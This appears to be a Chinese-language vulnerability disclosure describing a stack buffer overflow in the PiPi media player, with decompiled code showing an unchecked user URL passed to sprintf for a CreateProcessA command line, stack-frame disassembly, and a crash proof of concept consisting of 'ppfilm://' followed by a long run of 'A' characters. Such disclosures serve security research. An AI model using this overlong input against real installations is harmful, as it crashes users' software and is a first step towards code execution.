皮皮播放器溢出漏洞

简要描述:

皮皮播放器在处理用户输入的URL时,没有对其长度进行检测,从而造成溢出

详细说明:

皮皮播放器在处理用户输入的URL时,没有对其进行长度检测。
从而造成溢出。

不过,由于有GS,利用的时候有些困难

case 32780:        v9 = *(_DWORD *)(wParam + 4096);        v22 = 0;        v21 = v9;        *(_DWORD *)(wParam + 6344) = 1;        sub_40D480(v21, v22);        v42 = 5;        if ( CDialog::DoModal(&v31) == 1          && ATL::CStringT<char_StrTraitMFC_DLL<char_ATL::ChTraitsCRT<char>>>::Find(&v32, "://", 0) > 0 )        {          v10 = (const char *)ATL::CSimpleStringT<char_1>::operator char_const__(&v32);          if ( strnicmp(v10, "ppfilm://", 9u)     // 对输入的内容,比较前9位是否为ppfilm://            && (v11 = (const char *)ATL::CSimpleStringT<char_1>::operator char_const__(&v32), strnicmp(v11, "pvod://", 7u)) )          {            v22 = 0;            v21 = v12;            v29 = &v21;            ATL::CStringT<char_StrTraitMFC_DLL<char_ATL::ChTraitsCRT<char>>>::CStringT<char_StrTraitMFC_DLL<char_ATL::ChTraitsCRT<char>>>(              &v21,              &Default);            v20 = v13;            v28 = &v20;            LOBYTE(v42) = 6;            ATL::CStringT<char_StrTraitMFC_DLL<char_ATL::ChTraitsCRT<char>>>::CStringT<char_StrTraitMFC_DLL<char_ATL::ChTraitsCRT<char>>>(              &v20,              &Default);            v18 = v14;            *(_DWORD *)&Drive = &v18;            v41 = 7;            ATL::CStringT<char_StrTraitMFC_DLL<char_ATL::ChTraitsCRT<char>>>::CStringT<char_StrTraitMFC_DLL<char_ATL::ChTraitsCRT<char>>>(&v18);            LOBYTE(v42) = 5;            sub_4304F0(v3, v19, v20, v21, v22);          }          else          {            CommandLine = 0;            memset(&v34, 0, 0x1FCu);            v35 = 0;            v36 = 0;            sprintf(&CommandLine, "%s%s \"%s\"", dword_48AF30, "jfCacheMgr.exe", v32); //将输入的内容,直接调用sprintf函数,将其组合好的内容存放到CommandLine变量。              memset(&StartupInfo, 0, sizeof(StartupInfo));            ProcessInformation.hProcess = 0;            ProcessInformation.hThread = 0;            ProcessInformation.dwProcessId = 0;            ProcessInformation.dwThreadId = 0;            StartupInfo.cb = 68;            CreateProcessA(0, &CommandLine, 0, 0, 0, 0, 0, 0, &StartupInfo, &ProcessInformation);            if ( ProcessInformation.hThread )              CloseHandle(ProcessInformation.hThread);            if ( (_DWORD)ProcessInformation.hProcess )              CloseHandle(ProcessInformation.hProcess);          }        }        *(_DWORD *)(v3 + 6344) = 0;        v42 = -1;        result = sub_40D500(&v31);        break;

//////////////////////////////////////////////////////////////
对传入的url没有进行检测,直接调用sprintf(&CommandLine, "%s%s \"%s\"", dword_48AF30, "jfCacheMgr.exe", v32);
函数,然后把url的值赋给CommandLine值,从而造成溢出。
我们可以看到,在函数开始的地方,
text:00430C20 push ebp
.text:00430C21 mov ebp, esp
.text:00430C23 and esp, 0FFFFFFF8h
.text:00430C26 push 0FFFFFFFFh
.text:00430C28 push offset SEH_430C20
.text:00430C2D mov eax, large fs:0
.text:00430C33 push eax
.text:00430C34 mov large fs:0, esp
.text:00430C3B sub esp, 5F8h
//一共分配了0x5F8大小的栈。

漏洞证明:

我们构造如下URL:
“ppfilm://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA”

发表评论?

0 条评论。

发表评论